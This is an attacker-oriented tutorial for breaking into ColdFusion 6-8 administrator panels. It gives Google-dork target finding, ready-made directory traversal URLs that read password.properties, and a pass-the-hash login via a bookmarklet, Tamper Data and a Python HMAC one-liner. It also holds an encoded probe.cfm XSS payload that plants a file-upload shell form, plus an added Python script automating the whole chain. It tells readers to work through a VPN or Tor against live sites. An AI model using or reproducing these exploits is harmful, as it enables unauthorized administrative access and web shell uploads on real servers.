Cold Fusion Hacking Tutorial

 

 

Introduction

 

"ColdFusion is the name of a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications." - Wikipedia

 

ColdFusion has a reputation as a secure platform, and a lot of government and university websites run it. Finding vulnerable websites takes a lot of time and patience. This tutorial only covers versions 6, 7 and 8. The file read used below is the administrator-console locale directory traversal that Adobe patched in August 2010 (CVE-2010-2861, bulletin APSB10-18, with fixes shipped for 8.0.1 and 9.0.1), so a site that reports version 8 may already have the fix; the file paths given here are for 6, 7 and 8 only.

 

Requirements/Needed materials

 

You will need:

 

 

  • A VPN or Tor
  • A Javascript script that will be given later on
  • Tamper Data (a Firefox extension that lets you edit a request before it is sent)
  • Patience

 

 

 

 

Finding Vulnerable websites

 

Finding vulnerable websites takes a while. The simplest way is a Google dork: ext:cfm. .cfm is the file extension used by ColdFusion pages. In this tutorial, www.site.com stands in for the target website.

 

Testing if the website is vulnerable

 

First, get on a VPN or Tor. This part is a bit tricky because there are 2 parts. The 1st part is adding /CFIDE/administrator/ to the end of the site, so www.site.com/CFIDE/administrator/. That is the location of the admin panel, which is what we're exploiting. If all goes according to plan you should land on the admin login page, which also shows the version of ColdFusion it's running. If it's under 6 or above 8, find a different website. The 2nd part: if the version was 6-8, add one of the following after /CFIDE/administrator/. Each one is enough ..\ hops to reach the drive root and then a walk into the lib folder of the default install directory (C:\CFusionMX, C:\CFusionMX7 and C:\ColdFusion8 respectively); the %00 is a null byte that terminates the path, so whatever follows it in the locale value is ignored when the file is opened:

 

  • Version 6: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
  • Version 7: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en
  • Version 8: enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

 

If something like:

 


#Sat Feb 02 09:38:26 CET 2008
rdspassword=
password=D132F5908A92640541ED7E8F44679D6C0E644D9A
encrypted=true

 

shows up, the website is vulnerable. Copy the value after password= (everything up to encrypted=; in the sample above that is D132F5908A92640541ED7E8F44679D6C0E644D9A). It is the SHA-1 hash of the admin password, and you do not need to crack it: the login page never sends the password itself, only HMAC-SHA1 keyed with a per-page salt over that hash, so the hash alone is enough to log in.

 

 

Exploiting the vulnerability

 

Now add this script as a bookmark (a bookmarklet). The login form's own submit handler first SHA-1s what you typed and then HMACs that with the page's salt; the bookmarklet skips the SHA-1 step and HMACs the password box as-is, so with the stolen hash pasted in the box it produces exactly the value the server expects: javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))

 

Then open Tamper Data. Go back to the website, paste the hash into the password box and click the javascript bookmark; a window pops up with another value (the HMAC). Copy it. In Tamper Data click Start Tamper, go back to the website and click the login button. Tamper Data will ask whether you want to tamper with the request or let it through; use the "Keep tampering" checkbox so it stops prompting for later requests, then click Tamper. In the request editor (top right) find the cfadminPassword field: it holds the value the form's own JavaScript computed, which is wrong because it ran SHA-1 over the hash a second time. Replace it with the value from the popup and click OK. If done correctly you are now in the CF admin panel.

 

Extra things

 

"There's also another method: for example, if you failed to upload your shell, it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm.

 

To do this, add this to your URL:

 


http://www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E

 

It exploits a zero day XSS attack in probe.cfm.

 

Also, if the javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)) bookmark doesn't work, you can also use a python one-liner.

 

Here it is:


python3 -c 'import hashlib,hmac; h=input("Hash > "); salt=input("Salt > "); print("HMAC", hmac.new(salt.encode(), h.encode(), hashlib.sha1).hexdigest().upper())'

 

To see the hash, view the source and CTRL+F 'salt' and paste it in there; you should get the password in HMAC form and, as Cyber said, do that with Tamper Data." - INST1NCT
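Putting the whole procedure together, as an added example that is not code from the original post, from INST1NCT, or from Adobe: the script below does offline what the testing and exploiting sections above do by hand, and what INST1NCT's python one-liner does for the last step. It builds the enter.cfm?locale= traversal URL for a given version, pulls the password= value out of password.properties and checks it looks like the SHA-1 hash the login page expects, reads the salt out of the login page source, computes the same HMAC the bookmarklet and the one-liner produce, and returns the POST fields you would set in Tamper Data. The password.properties text and the login page fragment are constructed samples; the assumption that the salt sits in a hidden <input name="salt"> inside loginform is mine (the page only says to search the source for 'salt'); the eight ..\ hops and the %00en suffix are copied from the tutorial's URLs. Like the one-liner it uppercases the HMAC.

```python
# Added example (not from the original post or from Adobe): the ColdFusion
# 6/7/8 administrator pass-the-hash chain from this tutorial, run offline
# against constructed data. Only names that appear on the page are used
# (enter.cfm?locale=, password.properties, loginform, cfadminPassword, salt).
import hashlib
import hmac
import re

# Install directories named in the tutorial's three traversal URLs.
LIB_PATHS = {
    6: r"CFusionMX\lib\password.properties",
    7: r"CFusionMX7\lib\password.properties",
    8: r"ColdFusion8\lib\password.properties",
}

# Constructed sample, laid out the way the tutorial shows the file.
SAMPLE_PASSWORD_PROPERTIES = (
    "#Sat Feb 02 09:38:26 CET 2008\n"
    "rdspassword=\n"
    "password=D132F5908A92640541ED7E8F44679D6C0E644D9A\n"
    "encrypted=true\n"
)
# Constructed fragment of the login page source. Assumption: the salt the
# bookmarklet reads as document.loginform.salt.value is a hidden input.
SAMPLE_LOGIN_HTML = (
    '<form name="loginform" method="post" action="enter.cfm">'
    '<input type="hidden" name="salt" value="1328187234567">'
    '<input type="password" name="cfadminPassword">'
    "</form>"
)


def traversal_url(base, version, depth=8):
    """Build the enter.cfm?locale= traversal URL for a major version (6-8).

    depth is the number of ..\\ hops; the tutorial uses eight. The %00 is a
    null byte that terminates the path, so the 'en' after it is ignored.
    """
    if version not in LIB_PATHS:
        raise ValueError("tutorial only covers ColdFusion 6, 7 and 8")
    path = "..\\" * depth + LIB_PATHS[version]
    return f"{base.rstrip('/')}/CFIDE/administrator/enter.cfm?locale={path}%00en"


def parse_password_properties(text):
    """Parse key=value pairs; works whether the file comes back line by line
    or flattened onto one line as in the tutorial's sample output."""
    return {k: v for k, v in re.findall(r"(\w+)=(\S*)", text)}


def admin_hash(props):
    """Return the stored admin hash after checking it is what the login page
    expects: encrypted=true and 40 hex digits (a SHA-1 hex digest)."""
    h = props.get("password", "")
    if props.get("encrypted", "").lower() != "true":
        raise ValueError("password.properties is not storing a hash")
    if not re.fullmatch(r"[0-9A-Fa-f]{40}", h):
        raise ValueError("password= is not a 40-hex-digit SHA-1 hash")
    return h.upper()


def extract_salt(html):
    """Pull the salt hidden field out of the login page source (the value the
    tutorial tells you to CTRL+F for). Accepts name/value in either order."""
    m = re.search(r'<input[^>]*\bname="salt"[^>]*\bvalue="([^"]*)"', html)
    if m is None:
        m = re.search(r'<input[^>]*\bvalue="([^"]*)"[^>]*\bname="salt"', html)
    if m is None:
        raise ValueError("no salt field in login page")
    return m.group(1)


def login_token(salt, password_hash):
    """hex_hmac_sha1(salt, hash): the value the bookmarklet and the python
    one-liner produce, with the stolen hash standing in for the password."""
    return hmac.new(salt.encode(), password_hash.encode(), hashlib.sha1).hexdigest().upper()


def login_form_data(salt, password_hash):
    """POST fields for enter.cfm as Tamper Data should send them after you
    replace cfadminPassword. Copy any other hidden fields from the real form."""
    return {"cfadminPassword": login_token(salt, password_hash), "salt": salt}


def run_chain(properties_text, login_html):
    """Offline walk-through of the whole procedure: parse, check, salt, HMAC."""
    props = parse_password_properties(properties_text)
    h = admin_hash(props)
    salt = extract_salt(login_html)
    return login_form_data(salt, h)


if __name__ == "__main__":
    for v in (6, 7, 8):
        print(traversal_url("http://www.site.com", v))
    print(run_chain(SAMPLE_PASSWORD_PROPERTIES, SAMPLE_LOGIN_HTML))
```

Run as-is it prints the three traversal URLs for www.site.com and the form fields for the constructed sample. Against a live target you would fetch the properties file and the login page yourself over the VPN or Tor connection; the example deliberately makes no network requests, and admin_hash refuses anything that is not a 40-hex-digit value with encrypted=true, which is the quickest way to tell a real password.properties from an error page that happened to contain the word password.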

 

 

:D I hope you enjoyed the tutorial!

 

 

 
